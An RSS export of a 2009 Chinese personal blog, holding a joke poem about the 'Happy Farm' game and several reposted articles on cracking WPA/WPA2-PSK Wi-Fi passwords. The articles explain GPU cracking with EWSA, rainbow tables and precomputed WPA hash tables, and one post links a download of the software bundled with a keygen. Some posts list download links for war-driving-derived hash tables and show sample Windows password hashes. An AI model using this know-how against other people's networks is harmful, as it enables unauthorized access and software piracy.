href="http://b19.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf47a4b86db272be044f944038c1b5e864e791ee0d6c07dd5d57e41bb14e832b639720001261ca6971df2c0befe053082260bea49c8b15130a2eb2fbccdcabe84129b90bfd" target="_blank"><img style="width:670px;height:406px;border:0;" src="http://b19.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf47a4b86db272be044f944038c1b5e864e791ee0d6c07dd5d57e41bb14e832b639720001261ca6971df2c0befe053082260bea49c8b15130a2eb2fbccdcabe84129b90bfd" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfeeaa0b96d35c66be10a79a8c12b5ff87dbb8cd1ac6302605e038641b45129f51416d4bfbfec9682caff9007da1c3517ce8a3ee3a4ceca6be8ecc7ffe39c31755e9e01196" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfeeaa0b96d35c66be10a79a8c12b5ff87dbb8cd1ac6302605e038641b45129f51416d4bfbfec9682caff9007da1c3517ce8a3ee3a4ceca6be8ecc7ffe39c31755e9e01196" target="_blank"><img style="width:670px;height:395px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfeeaa0b96d35c66be10a79a8c12b5ff87dbb8cd1ac6302605e038641b45129f51416d4bfbfec9682caff9007da1c3517ce8a3ee3a4ceca6be8ecc7ffe39c31755e9e01196" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6ca33c2f6c9fba0bd0a3be1a0eba0c3e90f08e63032da27604e22ee68b0ba21683c47283cc4508bc34b83d907aec7d7a5a76bfb1f4747b990723a25a5e10a580a0a62913" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6ca33c2f6c9fba0bd0a3be1a0eba0c3e90f08e63032da27604e22ee68b0ba21683c47283cc4508bc34b83d907aec7d7a5a76bfb1f4747b990723a25a5e10a580a0a62913" target="_blank"><img style="width:670px;height:395px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6ca33c2f6c9fba0bd0a3be1a0eba0c3e90f08e63032da27604e22ee68b0ba21683c47283cc4508bc34b83d907aec7d7a5a76bfb1f4747b990723a25a5e10a580a0a62913" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf3c687fc89df3f02aa3db243ffbdd3b036a8fe75f176e2cdcd5fdb4ec4cb1f883230b41f9fa42796cafb19f7e02be5f6e4212025bc9fe1f7cf56497dbb9e605fabbb564c1" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf3c687fc89df3f02aa3db243ffbdd3b036a8fe75f176e2cdcd5fdb4ec4cb1f883230b41f9fa42796cafb19f7e02be5f6e4212025bc9fe1f7cf56497dbb9e605fabbb564c1" target="_blank"><img style="width:670px;height:437px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf3c687fc89df3f02aa3db243ffbdd3b036a8fe75f176e2cdcd5fdb4ec4cb1f883230b41f9fa42796cafb19f7e02be5f6e4212025bc9fe1f7cf56497dbb9e605fabbb564c1" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfe3615c2989efee24039e5e3b49607be6c2fe5f93272a0a6844bbeb9aa059cf15acb5cdc3c6235f690d67a718628c7aaea6c77a4af33d8614bedd9e49cda21443dc656858" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfe3615c2989efee24039e5e3b49607be6c2fe5f93272a0a6844bbeb9aa059cf15acb5cdc3c6235f690d67a718628c7aaea6c77a4af33d8614bedd9e49cda21443dc656858" target="_blank"><img style="width:670px;height:397px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cfe3615c2989efee24039e5e3b49607be6c2fe5f93272a0a6844bbeb9aa059cf15acb5cdc3c6235f690d67a718628c7aaea6c77a4af33d8614bedd9e49cda21443dc656858" /></a><wbr /></a><wbr /><br><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6356166c21da296fe89dcab31333899e272827d108dec353d635fa1833c5daac53c100719bad9a527efa40d52d877a0590691dd362b1432eb2303d08acf158d01d3069dc" target="_blank"><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6356166c21da296fe89dcab31333899e272827d108dec353d635fa1833c5daac53c100719bad9a527efa40d52d877a0590691dd362b1432eb2303d08acf158d01d3069dc" target="_blank"><img style="width:670px;height:421px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf6356166c21da296fe89dcab31333899e272827d108dec353d635fa1833c5daac53c100719bad9a527efa40d52d877a0590691dd362b1432eb2303d08acf158d01d3069dc" /></a><wbr /></a><wbr /><br><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf39fb54787bc53270f204e1dce114be13fdeb5c6f9607498f5024558412b18d39117c3b8cde3a4459edb1b4512e10678c7ab2e9b6cef99f2772845312963fdbf4636572e1" target="_blank"><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf39fb54787bc53270f204e1dce114be13fdeb5c6f9607498f5024558412b18d39117c3b8cde3a4459edb1b4512e10678c7ab2e9b6cef99f2772845312963fdbf4636572e1" target="_blank"><img style="width:670px;height:406px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=1c2368400ac26702516c4b1c121bc9cf39fb54787bc53270f204e1dce114be13fdeb5c6f9607498f5024558412b18d39117c3b8cde3a4459edb1b4512e10678c7ab2e9b6cef99f2772845312963fdbf4636572e1" /></a><wbr /></a><wbr /><br><span style="color:#0000FF;line-height:1.8em;">开心农场大坏蛋<br>培养网上盗窃犯<br>不睡觉，不吃饭<br>睡到半夜到处串<br>他攀墙，我跳院<br>月黑风高好做案<br>人手一张麻袋片<br>这拔葱，那拽蒜<br>茄子土豆偷成片<br>谁家菜地都不管<br>偷完马上往家窜<br>一到家里傻了眼<br>自家蔬菜全不见</span><wbr /><span style="color:#000000;line-height:1.8em;"><br></span><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258521109#comment</comments>
<qz:effect>134218249</qz:effect>
<pubDate>Wed, 18 Nov 2009 05:11:49 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258521109</guid>
</item>

<item>
<title><![CDATA[WPA终结梦魇----GPU运算之高速破解WPA-PSK加密实战]]></title>
<link>http://769626132.qzone.qq.com/blog/1258467413</link>
<description><![CDATA[现在很多朋友都在学习和研究WPA的破解及WPA PMK Hash破解，关于WPA PMK Hash的创建及使用，我已经在《无线网络安全攻防实战》一书中给出详细操作实例，并且为了给大家提供一个练手的机会，ZerOne安全团队无线安全组也在广州安全交流会上无偿提供给大家<span style="font-weight:bold"><wbr />高达4.3GB的WPA PMK Hash Table DVD光盘镜像</span><wbr /><a href="http://bigpack.blogbus.com/logs/31359696.html" target="_blank"><span style="font-weight:bold"><wbr /><span style="color:#0b59b2;line-height:1.8em;">下载</span><wbr /></span><wbr /></a><wbr />（大家可到Anywlan论坛或者我的Blog查看<a href="http://bigpack.blogbus.com/logs/31359696.html" target="_blank"><span style="color:#0b59b2;line-height:1.8em;">下载地址</span><wbr /></a><wbr />），呵呵，虽然也受到了一些莫名其妙的指责。但是作为高速破解的途径来说，从一开始，就不止Hash这一种方法，这里我要讲述的就是在未来几年内将会成为主流的破解方法---<span style="font-weight:bold"><wbr />GPU运算破解</span><wbr />。<br><br>关于GPU运算用于无线安全领域，ZerOne安全团队无线安全组已经于2008年中展开自主研发，并已取得一些成果，本文为引导更多朋友了解此类技术所写的基础工具型破解教程，望同一方向的朋友能和我联系，欢迎大家的交流。<br>好了话不多说，单机环境下只要配合合适的显卡，速度可以飙升到<span style="font-weight:bold"><wbr /><span style="font-size:18px;line-height:1.8em;">1万</span><wbr /></span><wbr />以上，若是性能优异的显卡可达到<span style="font-weight:bold"><wbr /><span style="font-size:18px;line-height:1.8em;">5万</span><wbr /></span><wbr />甚至更高。关于此类工具的详细安装、操作、破解、问题解答、软件下载内容我已经全部整理成基础破解教程，提供给大家下载。<br><span style="font-weight:bold"><wbr />文中涉及软件：Elcomsoft Wireless Security Auditor</span><wbr />（<span style="font-weight:bold"><wbr />简称为EWSA</span><wbr />）<br><span style="font-weight:bold"><wbr />软件版本：v1.0.0.133版</span><wbr /><br><span style="font-weight:bold"><wbr />支持系统：Windows 2000/XP/2003/Vista/2008</span><wbr /><br><span style="font-weight:bold"><wbr />软件下载：<a href="http://www.elcomsoft.com/ewsa.html" target="_blank"><span style="color:#0b59b2;line-height:1.8em;">http://www.elcomsoft.com/ewsa.html</span><wbr /></a><wbr /></span><wbr /><br>--------------------------------------------------------------<br>详细长达<span style="font-weight:bold"><wbr />11页</span><wbr />的<span style="font-weight:bold"><wbr />GPU运算破解WPA-PSK实战操作教程</span><wbr />，下载地址如下<br><a href="http://www.box.net/shared/ygjeeim9ms" target="_blank"><span style="color:#0b59b2;line-height:1.8em;">http://www.box.net/shared/ygjeeim9ms</span><wbr /></a><wbr /><br>GPU相关软件<span style="font-weight:bold"><wbr />EWSA</span><wbr />及注册机下载地址如下<br><a href="http://www.box.net/shared/h2n1mnhgqq" target="_blank"><span style="color:#0b59b2;line-height:1.8em;">http://www.box.net/shared/h2n1mnhgqq</span><wbr /></a><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258467413#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:16:53 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258467413</guid>
</item>

<item>
<title><![CDATA[解密WPA/WPA2加密高速破解的真相]]></title>
<link>http://769626132.qzone.qq.com/blog/1258467348</link>
<description><![CDATA[对于无线WPA加密环境，在获得了WPA握手验证包后，攻击者会通过暴力破解模式来进行WPA密码破解，同时也可以通过事先建立有针对性的字典，然后再进行字典破解(攻击)。对于大多数无线接入点AP而言，这将会是个 ...<br>　　对于无线WPA加密环境，在获得了WPA握手验证包后，攻击者会通过暴力破解模式来进行WPA密码破解，同时也可以通过事先建立有针对性的字典，然后再进行字典破解(攻击)。对于大多数无线接入点AP而言，这将会是个行之有效的方法。因为事实证明：绝大部分的管理员、维护人员、家庭用户的安全意识并没有他们自己认为的那么高，至少过去的一年多时间里，笔者已经遇到了无数设置为生日或者简单单词的WPA-PSK密码。<br>　　那么，是不是可以说，只要有足够空间、考虑周全的字典，破解WPA实际也就主要是时间的问题了。真的只是这样么?不知道大家仔细留意过没有，按照现在主流单机环境配置，在WPA破解速率上也就维持在100~~300k/s(k/s指的是破解时每秒调用的key数量)，以这样的破解速率，要把一个以小写字母和数字组合的5位WPA密码破开，我们来以基本的概率论知识估算一下：<br>　　(26+10)?= 60466176;<br>　　破解所有花费的时间将会是：<br>　　60466176/(3600×300)~~ 60466176/(3600×100)，即花费55.987~~167.962小时。<br>　　若是换算成天数的话，大概需要2~~7天。这还只是5位数WPA密码，若是采用WPA密码为纯小写字母且长度在10位数以上，则最快需要时间是5446261 天，也就是14921年!!真的是天位数字啊!!若是密码组合采用大小写字母+数字+特殊字符的话，恐怕连看到这里的你都会说：还是不用考虑破解了吧?<br>　　所以，前面讲述的获得到WPA握手后，进行的破解实际上只适用于是在对方采用简单密码的情况，也就是说，因为破解速率太慢，所以在对方采用稍微复杂的密码之后，这个常规方法就没有太多的实战能力甚至彻底失去破解意义。<br>　　若有人对概率知识稍有欠缺，或者觉得计算破解时间太麻烦的话，可以到下面这个网址上看看，这上面提供一个在线估算密码破解时间的服务，很方便。网址：<a href="http://lastbit.com/pswcalc.asp" target="_blank">http://lastbit.com/pswcalc.asp</a><wbr />，可以看到一个明显的Password Calculator标题，即密码估算。<br>　　在下面的栏目中，可以输入要计算密码的可能长度、使用计算机的破解速率、被用于破解的计算机数量、密码的组合可能(大小写字母、数字、通配符或全部)，填写完毕，点击下方的Calculate(计算)，在其下方就可以给出暴力破解的估算时间了。如下图2，可以看到估算出采用小写字母和数字组成的5位数密码，在单机以30k/s的速率破解需要时间为24天!!<br> <br>图 密码估算服务设置内容<br>看到这里，也许有的读者会想到：可以升级硬件设备啊，比如CPU、内存之类。不错，升级硬件确实可以在一定程度上提升破解，但那也是很有限的，比如就目前而言，普通独立计算机下内存最大也就能升级到4G，CPU无非就是最新的高缓存四核处理器。这样的配置对于刚才我们举例的10位WPA密码，破解时间还是以年来计算的!!<br>那么，那些高级黑客们又是怎么做的呢?难道只是靠单纯地提升硬件么?这里我们在揭开高速破解之前，先讲述一些概念：<br>Tables<br>可以说长期进行密码学研究的人很少有不知道这个的。在很多年前，国外的黑客们就发现单纯地通过导入字典，采用和目标同等算法破解，其速度其实是非常缓慢的，就效率而言根本不能满足实战需要。之后通过大量的尝试和总结，黑客们发现如果能够实现直接建立出一个数据文件，里面事先记录了采用和目标采用同样算法计算后生成的Hash散列数值，在需要破解的时候直接调用这样的文件进行比对，破解效率就可以大幅度地，甚至成百近千近万倍地提高，这样事先构造的Hash散列数据文件在安全界被称之为Table表(文件)。<br>Rainbow Tables<br>最出名的Tables是Rainbow Tables，即安全界中常提及的彩虹表，它是以Windows的用户帐户LM/NTLM散列为破解对象的。简单说明一下，在 Windows2000/XP/2003系统下，账户密码并不是明文保存的，而是通过微软所定义的算法，保存为一种无法直接识别的文件，即通常所说的SAM文件，这个文件在系统工作时因为被调用所以不能够被直接破解。但我们可以将其以Hash即散列的方式提取，以方便导入到专业工具破解，提取出来的密码散列类似于下面：<br>Administrator:500:96e95ed6bad37454aad3b435b51404ee:64e2d1e9b06cb8c8b05e42f0e6605c74::: <br>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: <br>user1:1001:732b2c9a2934e481cd0a8808b19097ef:778620d5d5de064154e689fa4790129f::: <br>user2:1002:a042f67a99758fd727b99b2375d829f9:6127ee12a83da34fc19953e538e4d580::: <br>若是以传统破解方式而言，无论是本地，还是内网在线破解，效率都不是很高。据实际测试，单机环境下，破解一个14位长包含大小写字母以及数字的无规律密码，一般是需要3~~9小时的，这个时间值会随着密码的复杂度及计算机性能差异提升到几天甚至数月不等。虽然说大部分人都不会使用这样复杂的密码，但对于目前很多密码足够复杂并且长度超过10位的密码比如“Y1a9n7g9z0h7e”，还是会令黑客们头痛不已。<br>2003年7月瑞士洛桑联邦技术学院Philippe Oechslin公布了一些实验结果，他及其所属的安全及密码学实验室(LASEC)采用了时间内存替换的方法，使得密码破解的效率大大提高。作为一个例子，他们将一个常用操作系统的密码破解速度由1分41秒，提升到13.6秒。这一方法使用了大型查找表对加密的密码和由人输入的文本进行匹配，从而加速了解密所需要的计算。这种被称作“内存-时间平衡”的方法意味着使用大量内存的黑客能够减少破解密码所需要的时间。<br>于是，一些受到启发的黑客们事先制作出包含几乎所有可能密码的字典，然后再将其全部转换成NTLM Hash文件，这样，在实际破解的时候，就不需要再进行密码与Hash之间的转换，直接就可以通过文件中的Hash散列比对来破解Windows帐户密码，节省了大量的系统资源，使得效率能够大幅度提升。当然，这只是简单的表述，采用的这个方法在国际上就被称为Time-Memory Trade-Off ，即刚才所说的“内存-时间平衡”法，有的地方也会翻译成“时间—内存交替运算法”。其原理可以理解为以内存换取时间，可由下图3表示：<br> <br>图 著名的“内存-时间平衡”法运算原理图<br>具体算法方面的内容本文就不再涉及，对于想进行更高深层次探究的读者，可以仔细参考2003年的这篇详细文档《Making a Faster Crytanalytical Time-Memory Trade-Off》以及2005年的文档《Time-Memory Trade-Offs: False Alarm Detection Using Checkpoints》，在本节后面会给出链接。<br>正是由于Rainbow Tables的存在，使得普通电脑在5分钟内破解14位长足够复杂的Windows帐户密码成为可能。<br> <br>图 对Windows账户进行Rainbow Tables破解<br>如上图4可以看到，类似于c78j33c6hnws、yemawangluo178、38911770这样的Windows帐户密码几乎全部在180秒即3分钟内破出，最短只用了5秒，个别稍长的密码破解开也没有超过3分钟。<br>由于这里我们讨论的是无线安全部分，所以本文就Windows下的Tables技术不再深入举例。有兴趣的读者可以从本文后面列出的网址查看更多的相关资料。<br>WPA-PSK Hash Tables<br>现在，在理解了“内存-时间平衡”法和Table的存在意义后，让我们回到无线领域，破解WPA-PSK也是同样的意思。在2006年举行的RECON 2006安全会议上，一位来自Openciphers组织的名为David Hulton的安全人员详细演示了使用WPA-PSK Hash Tables破解的技术细节，给与会者极大的震动。<br>下面所示的为会议上引用的WPA加密以及主密钥对匹配等建立WPA Tables所需理念的原理图，其中，MK为密码原文，PMK就是通过PBKDF2运算所得出的数值，PTK就是在PMK的基础上进行预运算产生的WPA Hash，这个Hash将用来和WPA 握手包中的值对照，若匹配即为密码。<br> <br>图 针对WPA加密Tables破解的原理图<br>这种采用了类似Rainbow Tables原理，通过Pre-Compute即预运算的方式，来进行提前运算以生成WPA-PSK加密Hash，从而建立起来的WPA-PSK Hash Tables，可以如事先设想般有效地大幅度提升破解效率。一般来说，可以将以前的100~~300 key/s的普通单机破解速率，提升到30，000~~100，000 key/s，提升了近300~~1000倍!!!这才是国内外无线黑客目前使用的破解技术，就一些地下组织而言，甚至个别秉持执著、探求本质精神的黑客通过改进优化代码等方式使得破解速率突破了150，000k/s，而且还有提升空间。这个速度意味着什么，如果再换置成最新的硬件配置呢?聪明的你一定明白。<br>下图6即为在cowpatty里对获取的WPA握手包进行WPA Table破解界面，可以看到在导入Table之后，破解速率达到了6，5228 pass/second。<br> <br>图 在Cowpatty里进行WPA Tables破解界面<br>我想，对于很多无线用户来说，这才是真正的噩梦。古希腊哲学家苏格拉底曾说过这么一句话： “认识你自己。” ，但实际上很多时候都是黑客背地猖獗，而很多网络及安全管理人员要么对攻击者的技术仅是略知皮毛，要么就根本一无所知，而且甚至不知道自己在经过所谓安全配置后的网络架构，将实际面临什么样的风险。<br>虽然说公开一些技术也许反而会引起个别心怀恶意的人注意，不过出于对无线安全理念的普及及深入理解，帮助很多已经完成或者正在进行无线网络规划的军警政机构、大中型企业及特殊部门，更清楚地认识到无线网络的风险，从而尽可能地完善自身的不足，避免不必要的损失，才是本书的出发点。<br>当然，要说明的是，Tables的建立并没有想象的那么容易，就建立本身而言，其效率非常低下，加上需要指定预攻击AP的SSID，想要建立一套针对所有常见接入点，并采用简单密码的WPA-PSK Hash Tables，其生成文件占据的硬盘空间最少也要1~~3G。需要深入了解WPA Table的读者，可以到这个名为The Church of Wifi的无线黑客组织了解更多内容，该组织官方站点为<a href="http://www.churchofwifi.org/" target="_blank">http://www.churchofwifi.org</a><wbr />，该组织在过去的两年里成功建立了庞大的WPA Table库，并将其简化的WPA-PSK Hash Table版本提供免费下载，对很多无线黑客而言，这确实是个福音，但遗憾的是，即便是简化版本，其大小也已经超过了30G。<br>感兴趣的读者可以到<a href="http://umbra.shmoo.com:6969/" target="_blank">http://umbra.shmoo.com:6969</a><wbr />去下载这个简化版本的Table种子文件，该Table全部下载回来大小有33.54GB，需要说明的是，生成该Table所依据的字典虽然经过黑客组织的筛选，但是由于国情不同，所以里面部分内容可能并不适合国内情况的使用比如虽然都会有人使用姓名作为密码，在国外可能是类似于BruceLee这样的英文名称，但是到了国内就可能是Lilianjie这样的拼音了。<br> <br>图 30G WPA Hash下载页面<br>不过，对于无线网络管理员，并不能因此松一口气，真正的噩梦才刚刚开始，因为这个方法也同样适用于破解WPA2加密。而且，国外一些地下高级黑客组织，也已经建立了高达500G的详尽WPA/WPA2攻击Table库，甚至一些基本完善的WPA-PSK Hash Tables已经在黑客网站上开始公开出售，只需要支付120美金左右，就会有8张包含WPA-PSK Hash Tables 的DVD光盘通过Fedex直接送到你的手上。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258467348#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:15:48 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258467348</guid>
</item>

<item>
<title><![CDATA[无线安全破解专用WPA-PSK Hash Table DVD下载地址汇总]]></title>
<link>http://769626132.qzone.qq.com/blog/1258467261</link>
<description><![CDATA[ <br><br> <br> 此次由ZerOne安全团队制作的无线安全破解专用DVD光盘，其中包含的WPA 破解 Hash Table已全部经过测试可用，所含SSID均为ZerOne安全团队在对多个省会城市进行多次实地War-Driving无线探测基础上，从汇总数据中精心挑选出国内使用频率最高的前62个SSID整理而成。光盘里除了包含多达40余种8位以上生日类密码组合外，还包括了8位以上普通用户常用密码组合，总容量达4.4GB。实为无线安全密码破解测试、无线渗透测试及安全评估之必备利器。<br><br>该DVD光盘内除了主要包含的大容量WPA-PSK/WPA2-PSK 破解用 Hash Table以外，为方便大家学习及借鉴，还附赠了由ZerOne安全团队近年来进行省会城市War-Driving的官方探测汇总报告，此外，还准备了相关无线安全教程的文档及资源列表。希望借此给大家研究无线网络安全带来实质性的帮助。<br>哈，作为国内第一张无线安全破解专用WPA-PSK Hash Table DVD，除实用价值外，也极具收藏和纪念意义！！<br>由于光盘体积过大，所以HTTP下载目前暂不可用，下为目前公开的下载方式及地址汇总：<br>WPA-PSK/WPA2-PSK光盘BT下载<br>种子一：<a href="http://bigpack.blogbus.com/files/12266612070.torrent" target="_blank">http://bigpack.blogbus.com/files/12266612070.torrent</a><wbr /><br>上述种子中的DVD光盘镜像文件已压缩，从ISO压成RAR，大约减少了900M，可为所有下载的朋友节省许多时间<br>种子文件物征码：60a0cca09203ed9b309c95047f3333acb1661d32 分块大小: 512 KB<br>种子二： <a href="http://bigpack.blogbus.com/files/12266612980.torrent" target="_blank">http://bigpack.blogbus.com/files/12266612980.torrent</a><wbr /><br>---------------------------------------------------------------------------<br>纳米盘下载<br>共22个分包。该资源比较大，需纳米机器人下载。没装纳米机器人，<a href="http://www.namipan.com/download.html" target="_blank">点此安装纳米机器人</a><wbr /><br><a href="http://www.namipan.com/d/cf8ead718bd56d87c471304ab70c32635c8ff3080000800c" target="_blank">ZerOne WPA HASH.part01.rar</a><wbr /><br><a href="http://www.namipan.com/d/267ef73843e6974d485c894304248aca4c45e3360000800c" target="_blank">ZerOne WPA HASH.part02.rar</a><wbr /><br><a href="http://www.namipan.com/d/f0ef8a27e6894d5c42ba1c43fcd8b2c9e2f2ea7d0000800c" target="_blank">ZerOne WPA HASH.part03.rar</a><wbr /><br><a href="http://www.namipan.com/d/44ea218268a2e2745a5051641031993bde4da6660000800c" target="_blank">ZerOne WPA HASH.part04.rar</a><wbr /><br><a href="http://www.namipan.com/d/2a46935d25b780b59b167db1d92eb23181b7ef0c0000800c" target="_blank">ZerOne WPA HASH.part05.rar</a><wbr /><br><a href="http://www.namipan.com/d/18009ba860fb991afcc9038f7f21e81f3d9083380000800c" target="_blank">ZerOne WPA HASH.part06.rar</a><wbr /><br><a href="http://www.namipan.com/d/8fea84f776290449a5c39aaec62cb5e3063c9cba0000800c" target="_blank">ZerOne WPA HASH.part07.rar</a><wbr /><br><a href="http://www.namipan.com/d/e5bba21b0b8c6ea1a4de199c74c243bc71d05a0b0000800c" target="_blank">ZerOne WPA HASH.part08.rar</a><wbr /><br><a href="http://www.namipan.com/d/5a2f44daa7abcdb682bf14e4419e95e64fc6dd2a0000800c" target="_blank">ZerOne WPA HASH.part09.rar</a><wbr /><br><a href="http://www.namipan.com/d/a6513d92a57004db146d4cc7294ac6edf1dc5d9b0000800c" target="_blank">ZerOne WPA HASH.part10.rar</a><wbr /><br><a href="http://www.namipan.com/d/a81e411839fbdb71e4ca98dde07c35bbcc2c19360000800c" target="_blank">ZerOne WPA HASH.part11.rar</a><wbr /><br><a href="http://www.namipan.com/d/14c798af992d9b577464044da557b7054a3a730c0000800c" target="_blank">ZerOne WPA HASH.part12.rar</a><wbr /><br><a href="http://www.namipan.com/d/c4d96ac550869afb018051586cb3759749e0db8a0000800c" target="_blank">ZerOne WPA HASH.part13.rar</a><wbr /><br><a href="http://www.namipan.com/d/5b6a29b14bb354bd82c16ee2fe8d3bddf2a855a80000800c" target="_blank">ZerOne WPA HASH.part14.rar</a><wbr /><br><a href="http://www.namipan.com/d/cc83b970cd8c7795a3014ddddde9ad7fe42c49920000800c" target="_blank">ZerOne WPA HASH.part15.rar</a><wbr /><br><a href="http://www.namipan.com/d/a4c694b39002351b91176cbd03a591f47be1bf2b0000800c" target="_blank">ZerOne WPA HASH.part16.rar</a><wbr /><br><a href="http://www.namipan.com/d/11187174484cb075ba5bdbd96b6da2d8f48e13c90000800c" target="_blank">ZerOne WPA HASH.part17.rar</a><wbr /><br><a href="http://www.namipan.com/d/ed7b549261fba2e6fa510e570d2f25da3f7f2e1f0000800c" target="_blank">ZerOne WPA HASH.part18.rar</a><wbr /><br><a href="http://www.namipan.com/d/d27b4e0676a387c9918b3e6d99211172f1d603080000800c" target="_blank">ZerOne WPA HASH.part19.rar</a><wbr /><br><a href="http://www.namipan.com/d/6a4e80168a1e82cb169e894f1ba3d1c3c3df73e00000800c" target="_blank">ZerOne WPA HASH.part20.rar</a><wbr /><br><a href="http://www.namipan.com/d/c913a38bf563f6c92d2d92157196c220ea63d93f0000800c" target="_blank">ZerOne WPA HASH.part21.rar</a><wbr /><br><a href="http://www.namipan.com/d/0e15056cc2a9b263bd4ca90a89597d0bc28fa224f058ad06" target="_blank">ZerOne WPA HASH.part22.rar</a><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258467261#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:14:21 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258467261</guid>
</item>

<item>
<title><![CDATA[WPA / WPA2加密高速破解]]></title>
<link>http://769626132.qzone.qq.com/blog/1258467111</link>
<description><![CDATA[ <br>听 <br> 最近在网上看到一篇帖子，《网上风行&quot;无线蹭网&quot;秘笈 破解密码只需10分钟》，看完后，心里一直痒痒，迫不及待的上网搜索了起来。看来自从离开黑鹰之后，咱这&quot;黑&quot;心还是存在的。网上搜索了下，晕了，各种方法、秘籍，好像不要钱一样全铺在网上。仔细看了一下，全是利用Linux系统来进行破解无线网密码的，有用Ubuntu的，有用BT3。其实二者都是Linux系统，只是作者不同，打造的系统界面也不同。 wep密码相对来说比较好破，我在我们公司实验，在有数据传输的情况下几分钟就可以破解，<span style="font-size:16px;line-height:1.8em;">我是在XP模式下运行虚拟机，下载的BT3，和spoonwep2,spoonwpa.</span><wbr /><br><span style="font-size:16px;line-height:1.8em;">WPA无线密码破解起来比较麻烦，重点说说这个：</span><wbr /><br><span style="font-size:16px;line-height:1.8em;">查看资料：</span><wbr /><br>对于无线WPA加密环境，在获得了WPA握手验证包后，攻击者会通过暴力破解模式来进行WPA密码破解，同时也可以通过事先建立有针对性的字典，然后再进行字典破解(攻击)。对于大多数无线接入点AP而言，这将会是个行之有效的方法。因为事实证明：绝大部分的管理员、维护人员、家庭用户的<a href="http://safe.it168.com/" target="_blank">安全</a><wbr />意识并没有他们自己认为的那么高，至少过去的一年多时间里，笔者已经遇到了无数设置为生日或者简单单词的WPA-PSK密码。<br>　　那么，是不是可以说，只要有足够空间、考虑周全的字典，破解WPA实际也就主要是时间的问题了。真的只是这样么?不知道大家仔细留意过没有，按照现在主流单机环境配置，在WPA破解速率上也就维持在100~~300k/s(k/s指的是破解时每秒调用的key数量)，以这样的破解速率，要把一个以小写字母和数字组合的5位WPA密码破开，我们来以基本的概率论知识估算一下：<br> <br>(26+10)?= 60466176;  <br>该5位数WPA密码可能性为：<br>破解所有花费的时间将会是：<br>60466176/(3600×300)~~ 60466176/(3600×100)，即花费55.987~~167.962小时。<br>若是换算成天数的话，大概需要2~~7天。这还只是5位数WPA密码，若是采用WPA密码为纯小写字母且长度在10位数以上，则最快需要时间是5446261 天，也就是14921年!!真的是天位数字啊!!若是密码组合采用大小写字母+数字+特殊字符的话，恐怕连看到这里的你都会说：还是不用考虑破解了吧?<br>所以，前面讲述的获得到WPA握手后，进行的破解实际上只适用于是在对方采用简单密码的情况，也就是说，因为破解速率太慢，所以在对方采用稍微复杂的密码之后，这个常规方法就没有太多的实战能力甚至彻底失去破解意义。<br> <br>重点：<br>采用了类似Rainbow Tables原理，通过Pre-Compute即预运算的方式，来进行提前运算以生成WPA-PSK加密Hash，从而建立起来的WPA-PSK Hash Tables，可以如事先设想般有效地大幅度提升破解效率。一般来说，可以将以前的100~~300 key/s的普通单机破解速率，提升到30，000~~100，000 